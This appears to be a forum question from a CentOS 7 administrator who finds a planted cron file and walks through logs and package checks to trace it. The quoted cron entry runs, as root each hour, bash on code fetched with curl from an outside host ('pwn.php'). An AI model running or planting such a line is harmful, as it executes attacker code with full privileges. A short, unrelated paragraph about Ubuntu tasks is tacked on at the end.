CentOS 7 hacked [duplicate]

This question already has an answer here:

  • How do I deal with a compromised server? 13 answers

A new file showed up at 07:07 EDT on one of my servers today:

# ll /etc/cron.d/sysstat2 -rw-r--r-- 1 root root 92 Jun 24 07:07 /etc/cron.d/sysstat2 # cat /etc/cron.d/sysstat2 53 * * * * root /bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1 

Luckily, whoever put it there screwed up, because every hour since I’ve received an email from cron saying:

/bin/sh: -c: line 0: syntax error near unexpected token `(' /bin/sh: -c: line 0: `/bin/bash <(curl -s https://www.sayitwithagift.com/pwn.php) >/dev/null 2>&1' 

07:07 is when cron ran its dailys:

Jun 24 07:07:10 run-parts(/etc/cron.daily)[4989]: starting logrotate Jun 24 07:07:10 run-parts(/etc/cron.daily)[16936]: finished logrotate Jun 24 07:07:10 run-parts(/etc/cron.daily)[4989]: starting man-db.cron Jun 24 07:07:11 run-parts(/etc/cron.daily)[16947]: finished man-db.cron Jun 24 07:07:11 run-parts(/etc/cron.daily)[4989]: starting mlocate Jun 24 07:07:16 run-parts(/etc/cron.daily)[16958]: finished mlocate Jun 24 07:07:16 run-parts(/etc/cron.daily)[4989]: starting rkhunter 

only thing /var/log/messages shows for that time:

Jun 24 07:07:09 yum[5617]: Installed: getpagespeed-extras-release.noarch 7-1.el7.gps Jun 24 07:07:09 yum[5617]: Erased: getpagespeed-extras 

which is confirmed by /var/log/yum:

Jun 24 07:07:09 Installed: getpagespeed-extras-release.noarch 7-1.el7.gps Jun 24 07:07:09 Erased: getpagespeed-extras 

but the file does not appear to have actually came with that package:

# rpm -ql getpagespeed-extras-release /etc/pki/rpm-gpg/RPM-GPG-KEY-GETPAGESPEED /etc/yum.repos.d/getpagespeed-extras.repo 

or any package:

# rpm -qf /etc/cron.d/sysstat2 file /etc/cron.d/sysstat2 is not owned by any package 

Server is setup for public key authentication only, and I just confirmed that by trying to connect from a different host:

#ssh -l root -p 57313 example.com Permission denied (publickey). 

yum update says I’m fully patched. I don’t know where to go from here.

Am I been hacked?

In an UBUNTU 18.04 installation here are two suspicious «non existent» tasks named 0000:06:00.0_di and 0000:06:00.0_ev. Log indicates that a problematic pci 0000:06:00.0 exists, but still there is no indication on how such a task started (task list says that command line was 0000:06:00.0_di and 0000:06:00.0_ev). Links to print screens task list, about and log.